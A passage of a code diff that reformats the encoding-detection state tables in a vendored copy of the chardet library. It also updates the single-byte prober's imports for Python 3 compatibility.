3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff +EUCTW_cls = ( + 2,2,2,2,2,2,2,2, # 00 - 07 + 2,2,2,2,2,2,0,0, # 08 - 0f + 2,2,2,2,2,2,2,2, # 10 - 17 + 2,2,2,0,2,2,2,2, # 18 - 1f + 2,2,2,2,2,2,2,2, # 20 - 27 + 2,2,2,2,2,2,2,2, # 28 - 2f + 2,2,2,2,2,2,2,2, # 30 - 37 + 2,2,2,2,2,2,2,2, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,2, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,6,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,3,4,4,4,4,4,4, # a0 - a7 + 5,5,1,1,1,1,1,1, # a8 - af + 1,1,1,1,1,1,1,1, # b0 - b7 + 1,1,1,1,1,1,1,1, # b8 - bf + 1,1,3,1,3,3,3,3, # c0 - c7 + 3,3,3,3,3,3,3,3, # c8 - cf + 3,3,3,3,3,3,3,3, # d0 - d7 + 3,3,3,3,3,3,3,3, # d8 - df + 
3,3,3,3,3,3,3,3, # e0 - e7 + 3,3,3,3,3,3,3,3, # e8 - ef + 3,3,3,3,3,3,3,3, # f0 - f7 + 3,3,3,3,3,3,3,0 # f8 - ff +) -EUCTW_st = ( \ - eError,eError,eStart, 3, 3, 3, 4,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17 - eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f - 5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27 - eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f +EUCTW_st = ( + eError,eError,eStart, 3, 3, 3, 4,eError,#00-07 + eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17 + eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f + 5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27 + eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f +) EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3) @@ -229,53 +277,55 @@ EUCTWSMModel = {'classTable': EUCTW_cls, # GB2312 -GB2312_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 3,3,3,3,3,3,3,3, # 30 - 37 - 3,3,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,4, # 78 - 7f - 5,6,6,6,6,6,6,6, # 80 - 87 - 6,6,6,6,6,6,6,6, # 88 - 8f - 6,6,6,6,6,6,6,6, # 90 - 97 - 6,6,6,6,6,6,6,6, # 98 - 9f - 6,6,6,6,6,6,6,6, # a0 - a7 - 6,6,6,6,6,6,6,6, # a8 - af - 6,6,6,6,6,6,6,6, # b0 - b7 - 6,6,6,6,6,6,6,6, # b8 - bf - 6,6,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 6,6,6,6,6,6,6,6, # e0 - e7 - 6,6,6,6,6,6,6,6, # e8 - ef - 6,6,6,6,6,6,6,6, # f0 - f7 - 6,6,6,6,6,6,6,0) # f8 - ff +GB2312_cls = ( + 1,1,1,1,1,1,1,1, # 00 - 07 + 
1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 3,3,3,3,3,3,3,3, # 30 - 37 + 3,3,1,1,1,1,1,1, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,4, # 78 - 7f + 5,6,6,6,6,6,6,6, # 80 - 87 + 6,6,6,6,6,6,6,6, # 88 - 8f + 6,6,6,6,6,6,6,6, # 90 - 97 + 6,6,6,6,6,6,6,6, # 98 - 9f + 6,6,6,6,6,6,6,6, # a0 - a7 + 6,6,6,6,6,6,6,6, # a8 - af + 6,6,6,6,6,6,6,6, # b0 - b7 + 6,6,6,6,6,6,6,6, # b8 - bf + 6,6,6,6,6,6,6,6, # c0 - c7 + 6,6,6,6,6,6,6,6, # c8 - cf + 6,6,6,6,6,6,6,6, # d0 - d7 + 6,6,6,6,6,6,6,6, # d8 - df + 6,6,6,6,6,6,6,6, # e0 - e7 + 6,6,6,6,6,6,6,6, # e8 - ef + 6,6,6,6,6,6,6,6, # f0 - f7 + 6,6,6,6,6,6,6,0 # f8 - ff +) -GB2312_st = ( \ - eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17 - 4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f - eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27 - eError,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f +GB2312_st = ( + eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07 + eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17 + 4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f + eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27 + eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f +) -# To be accurate, the length of class 6 can be either 2 or 4. -# But it is not necessary to discriminate between the two since -# it is used for frequency analysis only, and we are validing -# each code range there as well. So it is safe to set it to be -# 2 here. 
+# To be accurate, the length of class 6 can be either 2 or 4. +# But it is not necessary to discriminate between the two since +# it is used for frequency analysis only, and we are validing +# each code range there as well. So it is safe to set it to be +# 2 here. GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2) GB2312SMModel = {'classTable': GB2312_cls, @@ -286,46 +336,48 @@ GB2312SMModel = {'classTable': GB2312_cls, # Shift_JIS -SJIS_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 3,3,3,3,3,3,3,3, # 80 - 87 - 3,3,3,3,3,3,3,3, # 88 - 8f - 3,3,3,3,3,3,3,3, # 90 - 97 - 3,3,3,3,3,3,3,3, # 98 - 9f - #0xa0 is illegal in sjis encoding, but some pages does +SJIS_cls = ( + 1,1,1,1,1,1,1,1, # 00 - 07 + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,1, # 78 - 7f + 3,3,3,3,3,2,2,3, # 80 - 87 + 3,3,3,3,3,3,3,3, # 88 - 8f + 3,3,3,3,3,3,3,3, # 90 - 97 + 3,3,3,3,3,3,3,3, # 98 - 9f + #0xa0 is illegal in sjis encoding, but some pages does #contain such byte. We need to be more error forgiven. 
- 2,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,4,4,4, # e8 - ef - 4,4,4,4,4,4,4,4, # f0 - f7 - 4,4,4,4,4,0,0,0) # f8 - ff + 2,2,2,2,2,2,2,2, # a0 - a7 + 2,2,2,2,2,2,2,2, # a8 - af + 2,2,2,2,2,2,2,2, # b0 - b7 + 2,2,2,2,2,2,2,2, # b8 - bf + 2,2,2,2,2,2,2,2, # c0 - c7 + 2,2,2,2,2,2,2,2, # c8 - cf + 2,2,2,2,2,2,2,2, # d0 - d7 + 2,2,2,2,2,2,2,2, # d8 - df + 3,3,3,3,3,3,3,3, # e0 - e7 + 3,3,3,3,3,4,4,4, # e8 - ef + 3,3,3,3,3,3,3,3, # f0 - f7 + 3,3,3,3,3,0,0,0) # f8 - ff -SJIS_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart)#10-17 + +SJIS_st = ( + eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17 +) SJISCharLenTable = (0, 1, 1, 2, 0, 0) @@ -337,48 +389,50 @@ SJISSMModel = {'classTable': SJIS_cls, # UCS2-BE -UCS2BE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 
0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff +UCS2BE_cls = ( + 0,0,0,0,0,0,0,0, # 00 - 07 + 0,0,1,0,0,2,0,0, # 08 - 0f + 0,0,0,0,0,0,0,0, # 10 - 17 + 0,0,0,3,0,0,0,0, # 18 - 1f + 0,0,0,0,0,0,0,0, # 20 - 27 + 0,3,3,3,3,3,0,0, # 28 - 2f + 0,0,0,0,0,0,0,0, # 30 - 37 + 0,0,0,0,0,0,0,0, # 38 - 3f + 0,0,0,0,0,0,0,0, # 40 - 47 + 0,0,0,0,0,0,0,0, # 48 - 4f + 0,0,0,0,0,0,0,0, # 50 - 57 + 0,0,0,0,0,0,0,0, # 58 - 5f + 0,0,0,0,0,0,0,0, # 60 - 67 + 0,0,0,0,0,0,0,0, # 68 - 6f + 0,0,0,0,0,0,0,0, # 70 - 77 + 0,0,0,0,0,0,0,0, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,0,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,0,0,0,0,0,0,0, # a0 - a7 + 0,0,0,0,0,0,0,0, # a8 - af + 0,0,0,0,0,0,0,0, # b0 - b7 + 0,0,0,0,0,0,0,0, # b8 - bf + 0,0,0,0,0,0,0,0, # c0 - c7 + 0,0,0,0,0,0,0,0, # c8 - cf + 0,0,0,0,0,0,0,0, # d0 - d7 + 0,0,0,0,0,0,0,0, # d8 - df + 0,0,0,0,0,0,0,0, # e0 - e7 + 0,0,0,0,0,0,0,0, # e8 - ef + 0,0,0,0,0,0,0,0, # f0 - f7 + 0,0,0,0,0,0,4,5 # f8 - ff +) -UCS2BE_st = ( \ - 5, 7, 7,eError, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17 - 6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f - 6, 6, 6, 6, 5, 7, 7,eError,#20-27 - 5, 8, 6, 6,eError, 6, 6, 6,#28-2f - 6, 6, 6, 6,eError,eError,eStart,eStart)#30-37 +UCS2BE_st = ( + 5, 7, 7,eError, 4, 3,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17 + 6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f + 6, 6, 6, 6, 5, 7, 7,eError,#20-27 + 5, 8, 6, 6,eError, 6, 6, 6,#28-2f + 6, 6, 6, 6,eError,eError,eStart,eStart #30-37 +) UCS2BECharLenTable = (2, 2, 2, 0, 2, 2) @@ -390,48 +444,50 @@ UCS2BESMModel = {'classTable': UCS2BE_cls, # UCS2-LE -UCS2LE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 
17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff +UCS2LE_cls = ( + 0,0,0,0,0,0,0,0, # 00 - 07 + 0,0,1,0,0,2,0,0, # 08 - 0f + 0,0,0,0,0,0,0,0, # 10 - 17 + 0,0,0,3,0,0,0,0, # 18 - 1f + 0,0,0,0,0,0,0,0, # 20 - 27 + 0,3,3,3,3,3,0,0, # 28 - 2f + 0,0,0,0,0,0,0,0, # 30 - 37 + 0,0,0,0,0,0,0,0, # 38 - 3f + 0,0,0,0,0,0,0,0, # 40 - 47 + 0,0,0,0,0,0,0,0, # 48 - 4f + 0,0,0,0,0,0,0,0, # 50 - 57 + 0,0,0,0,0,0,0,0, # 58 - 5f + 0,0,0,0,0,0,0,0, # 60 - 67 + 0,0,0,0,0,0,0,0, # 68 - 6f + 0,0,0,0,0,0,0,0, # 70 - 77 + 0,0,0,0,0,0,0,0, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,0,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,0,0,0,0,0,0,0, # a0 - a7 + 0,0,0,0,0,0,0,0, # a8 - af + 0,0,0,0,0,0,0,0, # b0 - b7 + 0,0,0,0,0,0,0,0, # b8 - bf + 0,0,0,0,0,0,0,0, # c0 - c7 + 0,0,0,0,0,0,0,0, # c8 - cf + 0,0,0,0,0,0,0,0, # d0 - d7 + 0,0,0,0,0,0,0,0, # d8 - df + 0,0,0,0,0,0,0,0, # e0 - e7 + 0,0,0,0,0,0,0,0, # e8 - ef + 0,0,0,0,0,0,0,0, # f0 - f7 + 0,0,0,0,0,0,4,5 # f8 - ff +) -UCS2LE_st = ( \ - 6, 6, 7, 6, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17 - 5, 5, 5,eError, 5,eError, 6, 
6,#18-1f - 7, 6, 8, 8, 5, 5, 5,eError,#20-27 - 5, 5, 5,eError,eError,eError, 5, 5,#28-2f - 5, 5, 5,eError, 5,eError,eStart,eStart)#30-37 +UCS2LE_st = ( + 6, 6, 7, 6, 4, 3,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17 + 5, 5, 5,eError, 5,eError, 6, 6,#18-1f + 7, 6, 8, 8, 5, 5, 5,eError,#20-27 + 5, 5, 5,eError,eError,eError, 5, 5,#28-2f + 5, 5, 5,eError, 5,eError,eStart,eStart #30-37 +) UCS2LECharLenTable = (2, 2, 2, 2, 2, 2) @@ -443,67 +499,69 @@ UCS2LESMModel = {'classTable': UCS2LE_cls, # UTF-8 -UTF8_cls = ( \ +UTF8_cls = ( 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 2,2,2,2,3,3,3,3, # 80 - 87 - 4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 5,5,5,5,5,5,5,5, # a0 - a7 - 5,5,5,5,5,5,5,5, # a8 - af - 5,5,5,5,5,5,5,5, # b0 - b7 - 5,5,5,5,5,5,5,5, # b8 - bf - 0,0,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 7,8,8,8,8,8,8,8, # e0 - e7 - 8,8,8,8,8,9,8,8, # e8 - ef - 10,11,11,11,11,11,11,11, # f0 - f7 - 12,13,13,13,14,15,0,0) # f8 - ff + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 1,1,1,1,1,1,1,1, # 40 - 47 + 1,1,1,1,1,1,1,1, # 48 - 4f + 1,1,1,1,1,1,1,1, # 50 - 57 + 1,1,1,1,1,1,1,1, # 58 - 5f + 1,1,1,1,1,1,1,1, # 60 - 67 + 1,1,1,1,1,1,1,1, # 68 - 6f + 1,1,1,1,1,1,1,1, # 70 - 77 
+ 1,1,1,1,1,1,1,1, # 78 - 7f + 2,2,2,2,3,3,3,3, # 80 - 87 + 4,4,4,4,4,4,4,4, # 88 - 8f + 4,4,4,4,4,4,4,4, # 90 - 97 + 4,4,4,4,4,4,4,4, # 98 - 9f + 5,5,5,5,5,5,5,5, # a0 - a7 + 5,5,5,5,5,5,5,5, # a8 - af + 5,5,5,5,5,5,5,5, # b0 - b7 + 5,5,5,5,5,5,5,5, # b8 - bf + 0,0,6,6,6,6,6,6, # c0 - c7 + 6,6,6,6,6,6,6,6, # c8 - cf + 6,6,6,6,6,6,6,6, # d0 - d7 + 6,6,6,6,6,6,6,6, # d8 - df + 7,8,8,8,8,8,8,8, # e0 - e7 + 8,8,8,8,8,9,8,8, # e8 - ef + 10,11,11,11,11,11,11,11, # f0 - f7 + 12,13,13,13,14,15,0,0 # f8 - ff +) -UTF8_st = ( \ - eError,eStart,eError,eError,eError,eError, 12, 10,#00-07 - 9, 11, 8, 7, 6, 5, 4, 3,#08-0f - eError,eError,eError,eError,eError,eError,eError,eError,#10-17 - eError,eError,eError,eError,eError,eError,eError,eError,#18-1f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27 - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f - eError,eError, 5, 5, 5, 5,eError,eError,#30-37 - eError,eError,eError,eError,eError,eError,eError,eError,#38-3f - eError,eError,eError, 5, 5, 5,eError,eError,#40-47 - eError,eError,eError,eError,eError,eError,eError,eError,#48-4f - eError,eError, 7, 7, 7, 7,eError,eError,#50-57 - eError,eError,eError,eError,eError,eError,eError,eError,#58-5f - eError,eError,eError,eError, 7, 7,eError,eError,#60-67 - eError,eError,eError,eError,eError,eError,eError,eError,#68-6f - eError,eError, 9, 9, 9, 9,eError,eError,#70-77 - eError,eError,eError,eError,eError,eError,eError,eError,#78-7f - eError,eError,eError,eError,eError, 9,eError,eError,#80-87 - eError,eError,eError,eError,eError,eError,eError,eError,#88-8f - eError,eError, 12, 12, 12, 12,eError,eError,#90-97 - eError,eError,eError,eError,eError,eError,eError,eError,#98-9f - eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7 - eError,eError,eError,eError,eError,eError,eError,eError,#a8-af - eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7 - eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf - 
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7 - eError,eError,eError,eError,eError,eError,eError,eError)#c8-cf +UTF8_st = ( + eError,eStart,eError,eError,eError,eError, 12, 10,#00-07 + 9, 11, 8, 7, 6, 5, 4, 3,#08-0f + eError,eError,eError,eError,eError,eError,eError,eError,#10-17 + eError,eError,eError,eError,eError,eError,eError,eError,#18-1f + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27 + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f + eError,eError, 5, 5, 5, 5,eError,eError,#30-37 + eError,eError,eError,eError,eError,eError,eError,eError,#38-3f + eError,eError,eError, 5, 5, 5,eError,eError,#40-47 + eError,eError,eError,eError,eError,eError,eError,eError,#48-4f + eError,eError, 7, 7, 7, 7,eError,eError,#50-57 + eError,eError,eError,eError,eError,eError,eError,eError,#58-5f + eError,eError,eError,eError, 7, 7,eError,eError,#60-67 + eError,eError,eError,eError,eError,eError,eError,eError,#68-6f + eError,eError, 9, 9, 9, 9,eError,eError,#70-77 + eError,eError,eError,eError,eError,eError,eError,eError,#78-7f + eError,eError,eError,eError,eError, 9,eError,eError,#80-87 + eError,eError,eError,eError,eError,eError,eError,eError,#88-8f + eError,eError, 12, 12, 12, 12,eError,eError,#90-97 + eError,eError,eError,eError,eError,eError,eError,eError,#98-9f + eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7 + eError,eError,eError,eError,eError,eError,eError,eError,#a8-af + eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7 + eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf + eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7 + eError,eError,eError,eError,eError,eError,eError,eError #c8-cf +) UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6) diff --git a/thirdparty/chardet/sbcharsetprober.py b/thirdparty/chardet/sbcharsetprober.py index f92fc14c8..37291bd27 100644 --- a/thirdparty/chardet/sbcharsetprober.py +++ b/thirdparty/chardet/sbcharsetprober.py @@ -14,20 +14,22 
@@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from charsetprober import CharSetProber +import sys +from . import constants +from .charsetprober import CharSetProber +from .compat import wrap_ord SAMPLE_SIZE = 64 SB_ENOUGH_REL_THRESHOLD = 1024 @@ -38,21 +40,26 @@ NUMBER_OF_SEQ_CAT = 4 POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1 #NEGATIVE_CAT = 0 + class SingleByteCharSetProber(CharSetProber): - def __init__(self, model, reversed=constants.False, nameProber=None): + def __init__(self, model, reversed=False, nameProber=None): CharSetProber.__init__(self) self._mModel = model - self._mReversed = reversed # TRUE if we need to reverse every pair in the model lookup - self._mNameProber = nameProber # Optional auxiliary prober for name decision + # TRUE if we need to reverse every pair in the model lookup + self._mReversed = reversed + # Optional auxiliary prober for name decision + self._mNameProber = nameProber self.reset() def reset(self): CharSetProber.reset(self) - self._mLastOrder = 255 # char order of last character + # char order of last character + self._mLastOrder = 255 self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT self._mTotalSeqs = 0 self._mTotalChar = 0 - self._mFreqChar = 0 # characters that fall in our sampling range + # characters that fall in our sampling 
